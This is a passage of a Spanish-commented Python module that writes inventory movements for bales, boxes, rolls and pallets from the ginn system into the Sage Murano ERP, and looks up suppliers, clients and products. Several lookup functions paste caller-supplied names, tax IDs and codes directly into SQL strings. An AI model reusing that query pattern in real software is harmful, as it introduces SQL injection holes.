unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto, superficie,\n # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. 
Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_caja(caja, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea una caja en Murano a partir de la información del objeto caja en ginn.\n Si cantidad es 1, realiza un decremento.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = caja.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"La caja %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n partida = caja.partidaCem.codigo\n unidad_medida = \"KG\"\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(caja.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n ubicacion = \"Almac. de fibra embolsada.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = caja.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n caja.pale and caja.pale.codigo or \"\"\n # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. 
Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\n# pylint: disable=too-many-arguments\ndef create_pale(pale, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, observaciones=None,\n serie=\"API\", check_api=True):\n \"\"\"\n Crea un palé con todas sus cajas en Murano a partir del palé de ginn.\n\n Si cantidad es -1 saca el palé del almacén.\n\n Si `check_api` es True comprueba que el valor del campo api es correcto: si\n las cajas del palé ya existen en Murano con el mismo producto pero el valor\n de api para el artículo es False (por algún fallo anterior, por ejemplo),\n se cambia a True.\n \"\"\"\n assert observaciones is not None, \"murano.ops.create_pale::\"\\\n \"Debe indicar el motivo en el parámetro «observaciones».\"\n # Los palés se crean automáticamente al crear las cajas con el código de\n # palé informado. No hay que crear movimiento de stock ni de número de\n # serie para eso.\n # El palé no es más que un campo en las tablas de movimientos de stock, de\n # modo que no es necesario siquiera comprobar si existe. Lo que se\n # comprobarán serán sus cajas una a una para evitar duplicados.\n i = 0\n cajas = pale.cajas\n totcajas = len(cajas)\n if VERBOSE:\n # pylint: disable=import-error\n from lib.tqdm.tqdm import tqdm # Barra de progreso modo texto.\n cajas = tqdm(cajas, total=totcajas, leave=False)\n for caja in cajas:\n i += 1\n if VERBOSE:\n cajas.set_description(\"Creando caja %s... (%d/%d)\" % (\n caja.codigo, i, totcajas))\n # La primera caja instanaciará el IdProcesoIME y se lo iré pasando\n # a las demás cajas. No lanzo el fire de ninguna de ellas. Lo haré\n # cuando tenga el palé completo.\n guid_proceso = create_caja(caja,\n cantidad=cantidad,\n producto=producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=False,\n comentario=observaciones,\n serie=serie)\n # No es necesario. Cada caja lanza su proceso y el palé no crea\n # registros en la base de datos. No hay que lanzar ninún proceso adicional.\n if procesar:\n if guid_proceso: # Si todas las cajas ya existían,guid_proceso es None\n res = fire(guid_proceso)\n else: # Nada que insertar. Nada insertado. Resultado, False.\n res = False\n else:\n res = guid_proceso\n # if not res: # No se han insertado todas las cajas del palé.\n if check_api: # Puede que porque ya existan. Si es así, corrijo `api`\n # Compruebo y actualizo API de todos modos porque por algún motivo\n # que no tengo tiempo ahora de investigar, las cajas no se ponen\n # a True aunque se vuelquen bien a Murano. check_api es True por defec.\n for caja in cajas:\n articulo = caja.articulo\n articulo.api = existe_articulo(articulo)\n articulo.syncUpdate()\n # pale.api es propiedad. 
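En pclases\n    # viene a ser algo como all(caja.articulo.api for caja in pale.cajas).\n    # 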
Será True si todas sus cajas son api=True.\n res = pale.api\n return res\n\n\ndef consulta_proveedor(nombre=None, cif=None):\n \"\"\"\n Obtiene los datos de un proveedor buscando por nombre, cif o ambas cosas.\n Devuelve una lista de proveedores coincidentes en forma de diccionarios\n campo:valor para cada registro.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n sql = \"SELECT * FROM %s.dbo.Proveedores WHERE \" % (c.get_database())\n where = []\n if nombre:\n where.append(\"Nombre = '%s'\" % nombre)\n if cif:\n where.append(\"CifDni = '%s'\" % cif)\n if nombre and cif:\n where = \" AND \".join(where) # pylint: disable=redefined-variable-type\n else:\n where = where[0]\n where += \";\"\n sql += where\n res = c.run_sql(sql)\n return res\n\n\ndef consulta_cliente(nombre=None, cif=None):\n \"\"\"\n Obtiene los datos de un cliente buscando por nombre, cif o ambas cosas.\n Devuelve una lista de clientes coincidentes.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n sql = \"SELECT * FROM %s.dbo.Clientes WHERE \" % (c.get_database())\n where = []\n if nombre:\n where.append(\"Nombre = '%s'\" % nombre)\n if cif:\n where.append(\"CifDni = '%s'\" % cif)\n if nombre and cif:\n where = \" AND \".join(where) # pylint: disable=redefined-variable-type\n else:\n where = where[0]\n where += \";\"\n sql += where\n res = c.run_sql(sql)\n return res\n\n\ndef consultar_producto(producto=None, nombre=None, ean=None):\n \"\"\"\n Busca un producto por nombre, si se especifica el parámetro.\n Si no, y lo que recibe es el código EAN, busca por ese código.\n En otro caso, busca por el código `[PC|PV]id`. Se debe recibir el objeto\n producto de pclases.\n Devuelve una lista de productos coincidentes.\n \"\"\"\n assert not producto == nombre == ean == None # NOQA\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n if nombre:\n try:\n sql = \"SELECT * FROM {}.dbo.Articulos WHERE \".format(\n c.get_database())\n where = r\"DescripcionArticulo = '{}'\".format(nombre)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n # Busco por descripción, y si no lo encuentro, busco por la\n # descripción ampliada. Por eso hago esta asignación:\n # pylint: disable=unused-variable\n record = res[0] # NOQA\n except IndexError:\n sql = \"SELECT * FROM {}.dbo.Articulos WHERE \".format(\n c.get_database())\n where = r\"Descripcion2Articulo = '{}'\".format(nombre)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n except TypeError: # res es None. 
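\n # Boceto ilustrativo de las funciones de consulta (valores hipotéticos;\n # todas devuelven listas de diccionarios campo:valor):\n # provs = consulta_proveedor(nombre="ACME") # WHERE Nombre = 'ACME'\n # arts = consultar_producto(ean="8400000000000") # CodigoAlternativo\n # 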
Error con la base de datos\n if DEBUG:\n res = [] # pylint: disable=redefined-variable-type\n elif ean: # Busco por código EAN (CodigoAlternativo)\n sql = \"SELECT * FROM %s.dbo.Articulos WHERE \" % (c.get_database())\n where = r\"CodigoAlternativo = '%s'\" % (ean)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n else: # Busco por el código de Murano: PC|PV + ID\n idmurano = get_codigo_articulo_murano(producto)\n sql = \"SELECT * FROM %s.dbo.Articulos WHERE \" % (c.get_database())\n where = r\"CodigoArticulo = '%s'\" % (idmurano)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n if DEBUG:\n try:\n assert len(res) == 1\n except AssertionError:\n if not res or len(res) == 0:\n raise AssertionError(\"No se encontraron registros.\")\n elif len(res) > 1:\n raise AssertionError(\"Se encontró más de un artículo:\\n %s\" % (\n \"\\n\".join([str(i) for i in res])))\n return res\n\n\n# pylint: disable=unused-argument\ndef update_calidad(articulo, calidad, comentario=None, serie=\"API\",\n force=False, fecha=None):\n \"\"\"\n Cambia la calidad del artículo en Murano a la recibida. Debe ser A, B o C.\n\n Si el cambio es a calidad C hay casos donde se requiere un cambio de\n producto además de calidad. En ese caso solo se permite si el parámetro\n `force` es True.\n \"\"\"\n if calidad not in \"aAbBcC\":\n raise ValueError(\"El parámetro calidad debe ser A, B o C.\")\n # DONE: [Marcos Sage] No modificamos tablas. Hacemos salida del producto A\n # y volvemos a insertarlo como C. En ese caso no importa que se repita el\n # código para el mismo producto porque antes hemos hecho la salida.\n if calidad in \"Cc\" and not force:\n # TODO: Ojo porque si cambio a calidad C probablemente implique un\n # cambio de producto.\n raise NotImplementedError(\"Función no disponible por el momento.\")\n else:\n if not comentario:\n observaciones_baja = \"Baja por cambio a calidad {}\".format(calidad)\n else:\n observaciones_baja = comentario\n res = delete_articulo(articulo,\n observaciones=observaciones_baja,\n serie=serie, fecha=fecha)\n if res:\n if not comentario:\n observaciones_alta = \"Alta por cambio a calidad {}.\".format(\n calidad)\n else:\n observaciones_alta = comentario\n res = create_articulo(articulo, calidad=calidad,\n observaciones=observaciones_alta,\n serie=serie, fecha=fecha)\n return res\n\n\ndef update_peso(articulo, peso_real):\n \"\"\"\n Recibe un artículo **ya** volcado a Murano y actualiza el peso en Murano\n y en ginn.\n 0. Elimina el artículo de Murano.\n 1. Desmarca el artículo como volcado en ginn.\n 2. Actualiza el peso bruto, neto y real en ginn teniendo en cuenta peso de\n embalaje y demás.\n 3. Vuelca el artículo de nuevo a Murano.\n 4. 
Se comprueba el campo `api` respecto al resultado del volcado.\n \"\"\"\n serie = 'API'\n peso_anterior = articulo.peso_real\n observaciones = 'Cambio de peso de {} a {}.'.format(peso_anterior,\n peso_real)\n res = delete_articulo(articulo, observaciones=observaciones, serie=serie)\n if res:\n articulo.api = False\n articulo.set_peso_real(peso_real)\n articulo.api = create_articulo(articulo, observaciones=observaciones,\n serie=serie)\n articulo.sync()\n res = articulo.api\n return res\n\n\ndef duplica_articulo(articulo, producto=None):\n \"\"\"\n Devuelve True si al crear el artículo recibido con el producto indicado\n (o el que tenga asignado el artículo, si es None) crearía un duplicado.\n Es decir, si el artículo no existía en Murano (no tiene registro de\n movimiento de serie), devuelve False (no lo duplicaría si lo creara).\n Si el artículo ya existe en Murano pero ha salido en un movimiento de\n borrado desde fabricación --y no por albarán-- entonces tampoco lo\n duplicaría, devuelve False. Si el movimiento es de ajuste manual\n de salida, tampoco lo duplicaría.\n True en el resto de los casos (existe y el último movimiento es de\n albarán o de entrada de fabricación).\n Si tiene un movimiento de entrada de fabricación pero con otro producto,\n **sí** que duplicaría el código (que es lo que comprueba existe_articulo).\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n if not producto:\n producto = articulo.productoVenta\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if (not movserie or\n es_movimiento_salida_fabricacion(movserie) or\n es_movimiento_ajuste_api(movserie) or\n es_movimiento_salida_manual(movserie)):\n res = False\n else:\n res = True\n return res\n\n\ndef existe_articulo(articulo, productoVenta=None):\n \"\"\"\n Devuelve True si el artículo ya existe en Murano **Y** es del producto\n recibido. Si ni se recibe producto, se mira si existe con el producto del\n propio artículo según ginn.\n Se permite especificar producto para el caso del cambio de\n producto, donde no me interesa si el artículo existe, sino que si existe\n con el producto de destino para no duplicarlo.\n Se considera que si un artículo ha salido del almacén, sigue existiendo\n en Murano. Esto evita que se dupliquen códigos y se respete la\n trazabilidad.\n Recibe un objeto artículo de ginn.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n if not productoVenta:\n productoVenta = articulo.productoVenta\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(c, articulo)\n if not movserie:\n res = False\n else:\n codigo_producto_venta_actual = movserie['CodigoArticulo']\n codigo_producto_venta_preguntado = get_codigo_articulo_murano(\n productoVenta)\n res = codigo_producto_venta_actual == codigo_producto_venta_preguntado\n return res\n\n\ndef esta_en_almacen(articulo):\n \"\"\"\n Devuelve el código de almacén si el artículo está en algún almacén de\n Murano. 
Sea del producto que sea.\n False en caso contrario.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n # movserie = get_ultimo_movimiento_articulo_serie(c, articulo)\n # if not movserie:\n # # Si no ha tenido movimientos de serie, nunca ha existido en Murano.\n # res = False\n # else:\n # if es_movimiento_de_salida(movserie):\n # # Ha tenido movimientos, pero el último ha sido de salida.\n # res = False\n # else:\n # res = True\n sql = \"\"\"SELECT CodigoAlmacen\n FROM {}.dbo.ArticulosSeries\n WHERE CodigoEmpresa = {}\n AND UnidadesSerie > 0\n AND NumeroSerieLc = '{}'\n ORDER BY FechaInicial;\"\"\".format(c.get_database(), CODEMPRESA,\n articulo.codigo)\n articulos_serie = c.run_sql(sql)\n try:\n almacen = articulos_serie[-1]['CodigoAlmacen']\n except IndexError:\n almacen = None\n if not almacen:\n res = False\n else:\n res = almacen\n return res\n\n\ndef get_precio_coste(articulo):\n \"\"\"\n Devuelve el precio de coste por kg según Murano del artículo de ginn\n recibido.\n Se supone que debe coincidir con el que estaba definido para su familia\n en el mes en que se dio de alta.\n Es diferente al buscar_precio_coste para Murano, que devuelve el mismo\n valor pero desde la tabla Familias directamente. Sin tener en cuenta\n la tabla de precios de coste por mes.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n # Esto sería si en Sage lo hubiesen hecho bien. Pero la realidad es otra.\n # sql = \"\"\"SELECT GEO_CosteUnidadEspecifica\n # FROM {}.dbo.ArticulosSeries\n # WHERE CodigoEmpresa = {}\n # AND UnidadesSerie > 0\n # AND NumeroSerieLc = '{}'\n # ORDER BY FechaInicial;\"\"\".format(conn.get_database(), CODEMPRESA,\n # articulo.codigo)\n # Solo se han acordado de actualizar los movimientos de stock. Así que\n # tenemos que dar un rodeo para conseguir el valor.\n # OJO: ¿El último es el que tiene el precio bien? ¿Y si es un movimiento\n # de salida de stock y va el precio que le hemos dado al cliente? Bueno,\n # entonces no estará en stock. Aparte, inexplicablemente, el JOIN siempre\n # devuelve un único movimiento FAB. Para la salida de albarán de\n # MovimientoArticuloSerie no hay MovimientoStock. Pero ojo con los borrados\n # y nuevas creaciones. Ahí sí habrá más de un MovimientoStock. **Yo me\n # quedo siempre con el más reciente.**\n sql = \"\"\"SELECT Precio\n FROM {DB}.dbo.MovimientoArticuloSerie\n JOIN {DB}.dbo.MovimientoStock\n ON {DB}.dbo.MovimientoArticuloSerie.MovPosicionOrigen\n = {DB}.dbo.MovimientoStock.MovPosicion\n WHERE {DB}.dbo.MovimientoStock.CodigoEmpresa = {CE}\n AND {DB}.dbo.MovimientoArticuloSerie.NumeroSerieLc = '{cod}'\n ORDER BY {DB}.dbo.MovimientoStock.Fecha DESC;\"\"\".format(\n DB=conn.get_database(),\n CE=CODEMPRESA,\n cod=articulo.codigo)\n # DONE: ¿Y los cambios de producto, qué? Bueno, pues lo mismo. El más\n # reciente es el último alta en la base de datos. 
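\n # Forma esperada del resultado (boceto; los importes suelen llegar\n # como Decimal desde SQLServer):\n # [{'Precio': Decimal('0.97')}, ...] -> se toma el [0], el más reciente.\n # 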
El producto definitivo.\n articulos_serie = conn.run_sql(sql)\n try:\n precio_coste = articulos_serie[0]['Precio']\n except IndexError:\n precio_coste = None\n if not precio_coste:\n res = 0.0\n else:\n res = precio_coste\n return res\n\ndef es_movimiento_de_salida(movserie):\n \"\"\"\n Recibe un registro MovimientoArticuloSerie de Murano (diccionario) y\n devuelve True si es un movimiento de salida.\n No tiene en cuenta si es un interalmacén (lo tomará como salida también).\n \"\"\"\n res = (es_movimiento_salida_fabricacion(movserie) or\n es_movimiento_ajuste_api(movserie) or\n es_movimiento_salida_albaran(movserie))\n return res\n\n\ndef get_producto_articulo_murano(articulo):\n \"\"\"\n Devuelve el pclases.ProductoVenta que tenga asignado el artículo en Murano.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if movserie:\n murano_id = movserie['CodigoArticulo']\n pv = get_producto_ginn(murano_id)\n else: # Nunca ha entrado en Murano.\n pv = None\n return pv\n\n\ndef es_movimiento_salida_fabricacion(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida de fabricación\n (borrado en partes o consumo).\n OrigenDocumento es 2 para altas y 11 para bajas.\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'FAB')\n return res\n\n\ndef es_movimiento_ajuste_api(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida de fabricación\n (borrado en partes).\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'API')\n return res\n\n\ndef es_movimiento_salida_manual(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida por un ajuste\n manual por entrada/salida de movimientos de Murano.\n OJO: Esos movimientos los debe marcar el usuario como \"MAN\" en la Serie.\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'MAN')\n return res\n\n\ndef es_movimiento_entrada_manual(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de entrada por un ajuste\n manual por entrada/salida de movimientos de Murano.\n OJO: Esos movimientos los debe marcar el usuario como \"MAN\" en la Serie.\n \"\"\"\n res = (movserie['OrigenDocumento'] == ENTRADA and\n movserie['SerieDocumento'] == 'MAN')\n return res\n\n\ndef es_movimiento_salida_albaran(movserie):\n \"\"\"\n Devuelve el número de albarán (evaluable como True) por el que ha salido\n el artículo indicado en el registro MovimientoArticuloSerie.\n \"\"\"\n if movserie['OrigenDocumento'] == VENTA:\n serie = movserie['SerieDocumento']\n documento = movserie['Documento']\n res = serie + str(documento)\n else:\n res = False\n return res\n\n\ndef iter_create_articulos(articulos, simulate=False, serie='API', fecha=None,\n cantidad=1):\n \"\"\"\n Crea en Murano **en un solo proceso de importación** los artículos de\n _ginn_ recibidos en una lista.\n Si `simulate` es True, no conecta con Murano. Solo simula la operación con\n éxito.\n Devuelve True si **todos** los artículos se volcaron.\n Funciona **COMO UN GENERADOR** para poder ser usado en parte_produccion_*\n con barras de progreso. Devuelve en cada paso el artículo insertado en la\n tabla temporal listo para procesar. En el último paso devuelve el\n `guid_proceso` o algo interpretable como booleano, que será False si\n *alguno* de los artículos no se pudo importar. 
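\n Boceto ilustrativo de consumo del generador (doctest orientativo):\n\n >>> pasos = list(iter_create_articulos(articulos)) # doctest: +SKIP\n >>> pasos[-1] # ¿Se volcaron todos? # doctest: +SKIP\n True\n\n 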
El penúltimo es el\n guid_proceso **antes** de ejecutarse el `fire`, para poder notificar al\n usuario.\n \"\"\"\n i = 0\n # OJO: cantidad=-1 no está probado.\n assert abs(cantidad) == 1, \"Cantidad debe ser -1 o 1.\"\n # Cantidad fija para todos. Esto es solo para dar de alta\n # productos con trazabilidad más rápidamente.\n guid_proceso = None # El primer GUID es nulo. Hay que crearlo con el\n # primero de los artículos a volcar.\n observaciones = \"\" # Para que los comentarios del registro de Murano sean\n # automáticos y se fuerce la serie 'FAB'.\n procesar = True # Se puede llegar a usar, como con los palés, para\n # encadenar varias importaciones en un mismo proceso de importación. De\n # momento no se permite y se procesa la importación completa.\n totarticulos = len(articulos)\n lista_articulos = articulos # Conservo la lista original: tqdm la\n # sustituye abajo y su iterador se agota tras el primer bucle.\n if VERBOSE:\n # pylint: disable=import-error\n from lib.tqdm.tqdm import tqdm # Barra de progreso modo texto.\n articulos = tqdm(articulos, total=totarticulos, leave=False)\n for articulo in articulos:\n i += 1\n producto = articulo.productoVenta\n if VERBOSE:\n articulos.set_description(\"Creando articulo %s... (%d/%d)\" % (\n articulo.codigo, i, totarticulos))\n # El primer articulo instanciará el IdProcesoIME y se lo iré pasando\n # a los demás articulos. No lanzo el fire de ninguno de ellos. Lo haré\n # cuando tenga la estructura completa en la tmpIME montada.\n guid_proceso = create_articulo(articulo,\n cantidad=cantidad,\n producto=producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=False,\n codigo_almacen=None, # Auto\n calidad=None, # Auto\n observaciones=observaciones,\n serie=serie,\n fecha=fecha)\n yield articulo\n yield guid_proceso\n if procesar:\n if guid_proceso: # Si todos ya existían, guid_proceso es None.\n res = fire(guid_proceso)\n else: # Nada que insertar. Nada insertado. Resultado, False.\n res = False\n else:\n res = guid_proceso\n # Hasta que no finaliza no puedo comprobar si ha habido errores. Compruebo\n # los que se han volcado, les pongo el campo `.api` a True y devuelvo en\n # consecuencia.\n for articulo in lista_articulos:\n articulo.api = existe_articulo(articulo)\n articulo.syncUpdate()\n # res = reduce(lambda i, l: i and l, articulos)\n todos_volcados = len([i for i in lista_articulos\n if i.api]) == len(lista_articulos)\n res = len(lista_articulos) and todos_volcados and res\n yield res\n\n\ndef create_articulo(articulo, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, observaciones=None, serie=\"API\", fecha=None):\n \"\"\"\n Crea un artículo nuevo en Murano con el producto recibido. Si no se\n recibe ninguno, se usa el que tenga asociado en ginn. Si se recibe un\n objeto producto, se ignora el actual del artículo, se reemplaza en ginn\n por el recibido y se da de alta así en Murano.\n Devuelve False si hubo errores y no se creó o True (o el GUID de proceso)\n en otro caso.\n Las observaciones van como «comentario» en los registros de mov. de Murano.\n Si las observaciones son \"\", se usa el comentario por defecto del\n create_bala, *_rollo, etc. Pero se fuerza al usuario (más bien al código\n de partes_de_fabricacion_*) a que especifiquen la cadena vacía.\n Si `observaciones` es \"\" se usa la serie 'FAB' independientemente de\n lo que se haya indicado en `serie`.\n \"\"\"\n assert observaciones is not None, \"murano.ops.create_articulo::\"\\\n \"Debe indicar el motivo en el parámetro «observaciones».\"\n # TODO: ¿Y al descontar existencias? 
¿Comprobar también que existan antes?\n # De todos modos el proceso de importación devolverá error si la serie\n # está duplicada.\n if cantidad < 0:\n delta = -1\n else:\n delta = 1\n assert articulo is not None, \"Debe especificarse un artículo.\"\n res = False\n if delta < 0 or not duplica_articulo(articulo, producto):\n for i in range(abs(cantidad)): # pylint: disable=unused-variable\n if articulo.es_bala():\n res = create_bala(articulo.bala, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_balaCable():\n res = create_bala(articulo.balaCable, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_bigbag():\n res = create_bigbag(articulo.bigbag, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_caja():\n res = create_caja(articulo.caja, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rollo():\n res = create_rollo(articulo.rollo, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rollo_defectuoso():\n res = create_rollo(articulo.rolloDefectuoso, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n elif articulo.es_rolloC():\n res = create_rollo(articulo.rolloC, delta, producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=procesar,\n codigo_almacen=codigo_almacen,\n calidad=calidad,\n comentario=observaciones,\n serie=serie, fecha=fecha)\n else:\n raise ValueError(\"El artículo %s no es bala, bala de cable, \"\n \"bigbag, caja, rollo ni rollo C.\"\n % (articulo.puid))\n if VERBOSE:\n print(\"ops::create_articulo --> {}.res = {} ({})\".format(\n articulo.puid, res, type(res)))\n articulo.api = bool(res)\n articulo.syncUpdate()\n else:\n logging.warning(\"El código %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n return res\n\n\ndef update_producto(articulo, producto, observaciones=None, serie=\"API\",\n fecha=None):\n \"\"\"\n Cambia el artículo recibido al producto indicado.\n \"\"\"\n res = delete_articulo(articulo, observaciones=observaciones, serie=serie)\n if res:\n res = create_articulo(articulo, producto=producto,\n observaciones=observaciones,\n serie=serie, fecha=fecha)\n return res\n\n\ndef update_stock(producto, delta, almacen, guid_proceso=None,\n simulate=False, procesar=True):\n \"\"\"\n Incrementa o decrementa el stock del producto en la cantidad recibida en\n en el parámetro «delta».\n El producto **no** debe tener trazabilidad. 
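\n Ejemplo para un producto sin trazabilidad (boceto; «granza» y «silo1»\n son nombres hipotéticos):\n\n >>> update_stock(granza, -500.0, silo1) # doctest: +SKIP\n True\n\n 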
En otro caso deben usarse las\n funciones \"crear_[bala|rollo...]\".\n \"\"\"\n assert isinstance(producto, pclases.ProductoCompra)\n partida = \"\"\n unidad_medida = \"\" # producto.unidad\n comentario = (\"Stock [ginn] %f (%s)\" % (delta, producto.get_info()))[:40]\n serie = 'FAB'\n ubicacion = \"Almacén general\"[:15]\n numero_serie_lc = \"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n database = c.get_database()\n today = datetime.datetime.today()\n ejercicio = today.year\n periodo = today.month\n fecha = today.strftime(\"%Y-%m-%d %H:%M:%S\")\n documento = int(today.strftime(\"%Y%m%d\"))\n codigo_articulo = buscar_codigo_producto(producto)\n if isinstance(almacen, pclases.Almacen):\n codigo_almacen = buscar_codigo_almacen(almacen)\n else:\n codigo_almacen = almacen # He recibido un código directamente.\n codigo_talla = \"\" # No hay calidades en los productos de compra.\n grupo_talla = 0 # No tratamiento de calidad en productos sin trazabilidad.\n if delta >= 0:\n tipo_movimiento = 1 # 1 = entrada, 2 = salida.\n else:\n delta = abs(delta)\n tipo_movimiento = 2\n unidades = delta # En dimensión base del producto.\n # precio = producto.precioDefecto\n precio = buscar_precio_coste(producto, ejercicio, codigo_almacen)\n importe = unidades * precio\n factor_conversion = buscar_factor_conversion(producto)\n unidades2 = unidades * factor_conversion\n origen_movimiento = \"F\" # E = Entrada de Stock (entrada directa),\n # F (fabricación), I (inventario),\n # M (rechazo fabricación), S (Salida stock)\n # P (apertura), B(albarán de compra), A(albarán de venta)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n # En el movimiento de stock la unidad principal (unidad_medida) es la que\n # sea. En la segunda unidad (unidad_mediad2) mandamos \"\", que es lo que\n # me devolverá buscar_unidad_medida_basica para todo lo que no sea un\n # producto con código de trazabilidad.\n unidad_medida2 = buscar_unidad_medida_basica(producto)\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n 